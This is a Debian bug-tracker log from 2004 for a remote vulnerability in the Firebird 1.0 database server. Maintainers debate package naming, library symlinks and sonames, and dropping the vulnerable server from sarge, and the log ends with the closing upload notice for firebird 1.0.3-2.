> > > > > If this would happen I am not so sure about the usefulness of the
> > > > > firebird2 naming.
> 
> > > > Maybe we can rename it to firebird later, but I am not sure what 
> > > > reflections a rename will have right now, before sarge release.
> 
> > > I'm for renaming firebird2 to firebird.
> > > Could we do it now? Greg? Would be a problem with it now?
> 
> > Yes, it would be.  But really, there's no point doing that.
> > Having it as a separate package gives us more flexibility:
> 
> > * we would be able to push old fb into Sarge (i.e. with *big* security
> > warning and access allowed only from localhost, etc.) if we didn't
> > have fb2 in time (mind you, fb2 debs are NOT in testing yet and they
> > haven't had really wide testing as they only just hit unstable).
> 
> I'm sorry, but shipping a package with known exploitable security holes
> in sarge is not an option.

In general - yes.  But given how and what firebird is used for - I dare
to disagree.  Firebird is not ftp or http server to which whole internet
has access.  Rather the opposite.  The usual usages can be i.e. running
an application on client workstations on local, trusted network, that
connect to separate machine which runs firebird.  Or you have a web
application (think: PHP) that often runs on the same host.

But please, I would NOT want to spend resources discussing it currently.
If everything goes fine, and so far it goes really well, we should have
firebird2 in Sarge and old firebird removed from testing/Sarge.  This
will automatically resolve all discussion about security of the old
firebird packages.

> If no one is able to fix the security
> problems in the firebird server package (and I assume no one is, since
> this bug has been open so long), then the firebird server package will
> have to be removed from sarge -- along with all other binary packages
> from the same source, as well as all other binary packages depending on
> these packages.

> > This is a common practice that you add a release number to the package
> > name when you want to keep the old version around for users that might
> > need it.  Just see the output of 'apt-cache search tk8'.
> 
> I don't know that a comparison with a scripting language is the best
> one, here.  And the value of helping users keep remotely-exploitable
> software on their systems is definitely questionable.
> 

I think you yourself suggested that we could simply package libraries
for firebird, not the (exploitable) server.  This is yet another reason
to package firebird2 separately.  Mind you that fb2 is not yet in
testing and even though Daniel did marvelous job prepearing these
packages and fixing every single problem that was reported - we cannot
yet be sure that the packages that will hit testing around monday
will not contain yet some problems.  Given that, it was much better
to package firebird 1.0.x and firebird2 separately as this gives us
much greater flexibility.  And we definitely want to have some form
of firebird available for Sarge and surely we don't want to remove
from Sarge all packages that need firebird libraries.

> I see from the latest firebird2 upload that the library packages now
> provide: libfirebird and libfirebird2.  But the following is not
> appropriate in *any* library package:
> 
> $ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
> lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
> $
> 
> I have checked php4-interbase, and confirmed that the soname this file
> looks for is "libgds.so".  This means that there is no support
> whatsoever for rebuilding software against a new version of libgds,
> without breaking other programs that use the old version.  This is a
> truly horrid setup, and I would strongly recommend that you rebuild all
> of the firebird client packages prior to sarge's release so that they
> will have a proper dependency on libfirebird2 and you can drop the
> libgds.so symlink.

I let the more knowledgable people speak here, but AFAIR:
1. the library has rather stable API (for ex. applications that linked
against libgds.so coming from fb1 should work w/ libgds.so from fb2)
2. pretty much all existing applications expect libgds.so to exist
(even if I strongly agree this looks terribly) and they link against it.

Apparently upstream has done the first steps to remove this situation
by providing properly versioned library version and keeping the symlink
as backward compatibility option only.  But this will take a while
before developers will actualy start using the versioned lib name.
I really don't think we should make using firebird in Sarge such painful
experience for our users.  Currently 99% of the software they might ever
want to compile against firebird libraries will look for the .so file
only.

> (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> soversion of either of the libraries contained in this package.)

The goal of firebird 1.0.x was to get something usable from the original
interbase 6 beta code, while the "new" firebird was supposed to have
significant changes like usage of C++ and development of truly new
features.  Therefore the new firebird was started to be reffered to as
firebird2.  The 1.5 version is IIRC something in between.  Still
compatible with firebird 1.0.x series, but already containing all
the newest developments.  The 1.5 version might be viewed as something
like deep-pre-2.0.

Cheers,

				Grzegorz B. Prokopski

-- 
Grzegorz B. Prokopski      <gadek@debian.org>
Debian GNU/Linux           http://www.debian.org
SableVM - LGPL'ed Java VM  http://www.sablevm.org
Why SableVM ?!?            http://devel.sablevm.org/wiki/Features

Message #95 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: Steve Langasek <vorlon@debian.org>

To: "Grzegorz B. Prokopski" <gadek@debian.org>

Cc: Daniel Urban <daniel@sente.pl>, 251458-quiet@bugs.debian.org, Damyan Ivanov <divanov@creditreform.bg>, Debian Firebird Group <pkg-firebird-general@lists.alioth.debian.org>, ed@debian.org, nledez@virtual-net.fr

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Sat, 31 Jul 2004 16:34:11 -0700

[Message part 1 (text/plain, inline)]

On Sat, Jul 31, 2004 at 12:43:16PM -0400, Grzegorz B. Prokopski wrote:

> > I see from the latest firebird2 upload that the library packages now
> > provide: libfirebird and libfirebird2.  But the following is not
> > appropriate in *any* library package:

> > $ dpkg -c libfirebird2-classic_1.5.0-1_i386.deb |grep /usr/lib/libgds
> > lrwxrwxrwx root/root         0 2004-07-19 05:27:21 ./usr/lib/libgds.so -> libfbembed.so.1.5.0
> > $

> > I have checked php4-interbase, and confirmed that the soname this file
> > looks for is "libgds.so".  This means that there is no support
> > whatsoever for rebuilding software against a new version of libgds,
> > without breaking other programs that use the old version.  This is a
> > truly horrid setup, and I would strongly recommend that you rebuild all
> > of the firebird client packages prior to sarge's release so that they
> > will have a proper dependency on libfirebird2 and you can drop the
> > libgds.so symlink.
> 
> I let the more knowledgable people speak here, but AFAIR:
> 1. the library has rather stable API (for ex. applications that linked
> against libgds.so coming from fb1 should work w/ libgds.so from fb2)
> 2. pretty much all existing applications expect libgds.so to exist
> (even if I strongly agree this looks terribly) and they link against it.
> 
> Apparently upstream has done the first steps to remove this situation
> by providing properly versioned library version and keeping the symlink
> as backward compatibility option only.  But this will take a while
> before developers will actualy start using the versioned lib name.
> I really don't think we should make using firebird in Sarge such painful
> experience for our users.  Currently 99% of the software they might ever
> want to compile against firebird libraries will look for the .so file
> only.

If they are *compiling* software, then they install the dev package.
*All* applications that are being compiled look for only the .so file;
but a properly implemented shared library will provide a versioned
SONAME for use at runtime.

If they have pre-compiled applications that reference libgds.so, then of
course the symlink must be there.  Personally, I think it would be
better to include this symlink in a -compat package, however.

> > (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> > soversion of either of the libraries contained in this package.)

> The goal of firebird 1.0.x was to get something usable from the original
> interbase 6 beta code, while the "new" firebird was supposed to have
> significant changes like usage of C++ and development of truly new
> features.  Therefore the new firebird was started to be reffered to as
> firebird2.  The 1.5 version is IIRC something in between.  Still
> compatible with firebird 1.0.x series, but already containing all
> the newest developments.  The 1.5 version might be viewed as something
> like deep-pre-2.0.

The names of library packages should be related to the soversion of the
libraries they contain, not to some upstream notion of the software's
version number.  What will you name these library packages when
libfbclient.so.2 is released?

-- 
Steve Langasek
postmodern programmer

[signature.asc (application/pgp-signature, inline)]

Message #100 received at 251458-quiet@bugs.debian.org (full text, mbox, reply):

From: "Daniel Urban" <daniel@sente.pl>

To: "Steve Langasek" <vorlon@debian.org>, <251458-quiet@bugs.debian.org>

Subject: Re: Bug#251458: [Pkg-firebird-general] Re: Bug#251458: firebird: remote vulnerability

Date: Mon, 2 Aug 2004 08:27:08 +0200

Hi

> (BTW, where does the "2" in "libfirebird2" come from?  This is not the
> soversion of either of the libraries contained in this package.)

"Development on the Firebird 2 codebase began early in Firebird 1
development, with the porting of the Firebird 1 C code
(http://cvs.sourceforge.net/viewcvs.py/firebird/interbase/) to C++ and the
first major code-cleaning. Firebird 1.5 is the first release of the Firebird
2 codebase (http://cvs.sourceforge.net/viewcvs.py/firebird/firebird2/). It
is a significant milestone for the developers and the whole Firebird
project, but it is not an end in itself. As Firebird 1.5 goes to release,
major redevelopment continues toward the next point release on the journey
to Firebird 2."

With regards
Daniel Urban

Message #105 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: 255471@bugs.debian.org, 268931@bugs.debian.org, 251458@bugs.debian.org

Subject: Plan to get firebird, firebird2 and php4-interbase working in sarge.

Date: Thu, 2 Sep 2004 21:21:26 +0200

[Message part 1 (text/plain, inline)]

Hello,

Because of an unfixable security bug in the firebird 1.0.x (RC bug #251458)
firebird1 packages got removed from sarge. This triggered RC bug #268931.
php4-interbase could no longer be build anymore since firebird-dev
was no longer available in sarge.

To solve this php4-interbase was build against the newer firebird2 libs
which triggered RC bug #255471 and the newer package couldn't go into
sarge.

Firebird1 is now considered obsolete.

To get out of this mess for sarge I am packaging firebird1 libs without
the server so the current linking situation in sarge which has been tested
for a long time can be kept. That is php4-interbase (4.3.6-1) linked against
libfirebird1. This works with the new version of firebird and has an added
bonus of being backwards compatible with unofficial 1.0.x firebird packages.

This will solve all bugs #251458, #268931 and #255471. 

php4-interbase 4.3.8 packages in unstable will be rebuild against libfirebird1
instead of libfirebird2 and when they really look stable be allowed in sarge
if we didn't freeze by then.

After sarge a more permanent solution for the problem can be worked out and
the firebird1 packages can then be dropped.

Cheers,
Remco.

[Message part 2 (application/pgp-signature, inline)]

Message #110 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>

To: Remco Seesink <raseesink@hotpop.com>, 251458@bugs.debian.org

Subject: Re: [Pkg-firebird-general] Bug#251458: Plan to get firebird, firebird2 and php4-interbase working in sarge.

Date: Fri, 03 Sep 2004 10:53:38 +0300

[Message part 1 (text/plain, inline)]

Remco Seesink wrote:
> To get out of this mess for sarge I am packaging firebird1 libs without
> the server so the current linking situation in sarge which has been tested
> for a long time can be kept. That is php4-interbase (4.3.6-1) linked against
> libfirebird1. This works with the new version of firebird and has an added
> bonus of being backwards compatible with unofficial 1.0.x firebird packages.
> 
> This will solve all bugs #251458, #268931 and #255471. 

Can libfirebird1 co-exist with libfirebird2-* ? My impression was that 
libfirebird2-* replace/provide/conflict with libfirebird1. If I am 
correct, php4-interbase 4.3.6 would be uninstallable if libfirebird2-* 
in installed. I see that in this case php4-interbase will be 
uninstallable only on systems with firebird2-server installed. If your 
server is on ona machine, and your web server - on another this shall be 
no problem. For development, however, it is not uncommon to put 
everithing on one machine - firebird2-server (with libfirebird2) and 
apache (with php4-interbase).

On the other side, you may have in mind only build-depends on 
libfirebird1 and depends on libfirebird (generic, provided by both 
libfirebird1 and libfirebird2), in which case things may actually work :-)

> php4-interbase 4.3.8 packages in unstable will be rebuild against libfirebird1
> instead of libfirebird2 and when they really look stable be allowed in sarge
> if we didn't freeze by then.

> After sarge a more permanent solution for the problem can be worked out and
> the firebird1 packages can then be dropped.

Can the alternative system be used for this? I.e. we have two 
alternatives for libfirebird2 - "-classic" and "-super". They can't both 
be installed simultaneously, and they both provide the same API.

So php4-interbase can depend (and build-depend) on libfirebird2, which 
is provided by either libfirebird2-classic or libfirebird2-super.

The key point is to make php4-interbase link agains the "alternative 
alias". Currently, 3.6.1 is linked against libgds (provided by 
libfirebird1), which became a compatibility symlink in libfirebird2. 
This is just fine, but I can't imagine how to do it when building 
against libfirebird2 :-|

I am not sure if "alternative" has to be replaced with "diversion" 
above. I am not fluent with both alternative and diversion systems.


Hope this gives some food for thought.


dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500

[signature.asc (application/pgp-signature, attachment)]

Message #115 received at 251458@bugs.debian.org (full text, mbox, reply):

From: Damyan Ivanov <divanov@creditreform.bg>

To: Damyan Ivanov <divanov@creditreform.bg>, 251458@bugs.debian.org

Cc: Remco Seesink <raseesink@hotpop.com>

Subject: Re: Bug#251458: [Pkg-firebird-general] Bug#251458: Plan to get firebird, firebird2 and php4-interbase working in sarge.

Date: Fri, 03 Sep 2004 13:11:34 +0300

[Message part 1 (text/plain, inline)]

Hi, Remco,

I am thinking about the long term solution... and the best thing I've 
come is:

in libfirebird2-classic:

rename the library to libfirebird2-classic (with all the .0, .so.0's) 
and provide *hardlinks* named libfirebird2 (with all the .0 and .so.0's

in libfirebird2-super:

rename the library to libfirebird2-super (ditto for .0 and .so.0's)
and provide *hardlinks* named libfirebird2 (ditto)

libfirebird2-* should conflict with each other and provide libfirebird2.

This way, any package compiled against either of them will link against 
libfirebird2, not against libfb(client|embed)

Now that I write this, I am wondering, ain't it possible to rename the 
library to libfirebird2 in both packages? This way there will be no need 
of any ugly hardlinks.

All packages, depending on libfirebord2-* must be recompiled, of course, 
and made link with libfirebird2. These are firebird2-server-* and 
php4-interbase. All three of these are yours, so there's no need to 
bother other maintainers :-)

Also, php4-interbase can build-depend and depend just on libfirebird2 
(provided by -classic and -super).


What do you think?


dam

-- 
Damyan Ivanov                             Creditreform Bulgaria
divanov@creditreform.bg             http://www.creditreform.bg/
phone: +359(2)928-2611, 929-3993           fax: +359(2)920-0994
mobile: +359-88-856-6067      ICQ: 3028500      Y!M: dam3028500

[signature.asc (application/pgp-signature, attachment)]

Message #120 received at 251458-close@bugs.debian.org (full text, mbox, reply):

From: Remco Seesink <raseesink@hotpop.com>

To: 251458-close@bugs.debian.org

Subject: Bug#251458: fixed in firebird 1.0.3-2

Date: Mon, 06 Sep 2004 11:32:38 -0400

Source: firebird
Source-Version: 1.0.3-2

We believe that the bug you reported is fixed in the latest version of
firebird, which is due to be installed in the Debian FTP archive:

firebird-dev_1.0.3-2_i386.deb
  to pool/main/f/firebird/firebird-dev_1.0.3-2_i386.deb
firebird_1.0.3-2.diff.gz
  to pool/main/f/firebird/firebird_1.0.3-2.diff.gz
firebird_1.0.3-2.dsc
  to pool/main/f/firebird/firebird_1.0.3-2.dsc
libfirebird-c32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c32_1.0.3-2_i386.deb
libfirebird-c64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-c64_1.0.3-2_i386.deb
libfirebird-s32_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s32_1.0.3-2_i386.deb
libfirebird-s64_1.0.3-2_i386.deb
  to pool/main/f/firebird/libfirebird-s64_1.0.3-2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 251458@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Remco Seesink <raseesink@hotpop.com> (supplier of updated firebird package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu,  2 Sep 2004 21:26:01 +0200
Source: firebird
Binary: libfirebird-s64 libfirebird-c64 libfirebird-s32 firebird-dev libfirebird-c32
Architecture: source i386
Version: 1.0.3-2
Distribution: unstable
Urgency: high
Maintainer: Debian Firebird RDBMS Team <pkg-firebird-general@lists.alioth.debian.org>
Changed-By: Remco Seesink <raseesink@hotpop.com>
Description: 
 firebird-dev - Development files for FireBird - RDBMS based on InterBase 6.0 cod
 libfirebird-c32 - Library files for FireBird Classic w/ 32bit I/O, InterBase compat
 libfirebird-c64 - Library files for FireBird Classic w/ 64bit I/O, InterBase compat
 libfirebird-s32 - Library files for FireBird Super w/ 32bit I/O, InterBase compat
 libfirebird-s64 - Library files for FireBird Super w/ 64bit I/O, InterBase compat
Closes: 251458
Changes: 
 firebird (1.0.3-2) unstable; urgency=high
 .
   * This package will provide only firebird libraries from now on, which are
     useful for backward compatibility.  Closes: #251458
   * Documenting the situation in README.Debian
   * This version is needed to solve #268931 for sarge.
Files: 
 65e13b920594de0198d4b198a54116fb 807 misc optional firebird_1.0.3-2.dsc
 ce6fc5a808bbf1de2bf6ab726e0f7c6c 1111742 misc optional firebird_1.0.3-2.diff.gz
 2d27f35ce052580b76f17dfd9dd04b99 85828 misc optional firebird-dev_1.0.3-2_i386.deb
 504efc41a71dcb326f14748e1bec2c26 683992 misc optional libfirebird-c32_1.0.3-2_i386.deb
 84577cdd620fb659fa7267d7a5256ac8 146078 misc optional libfirebird-s32_1.0.3-2_i386.deb
 6977a6078ca22c667f1233c0ef5fffcc 684032 misc optional libfirebird-c64_1.0.3-2_i386.deb
 806dfaef69e3e977e081ca510d3fb3c3 146266 misc optional libfirebird-s64_1.0.3-2_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)

iD8DBQFBPH4D4vzFZu62tMIRAhZqAJ9aKK0bghFyUlKdSY46m9ISvKweVACeJZbr
1SucDg6/wAonq9IPiz1MY28=
=KY+c
-----END PGP SIGNATURE-----

Send a report that this bug log contains spam.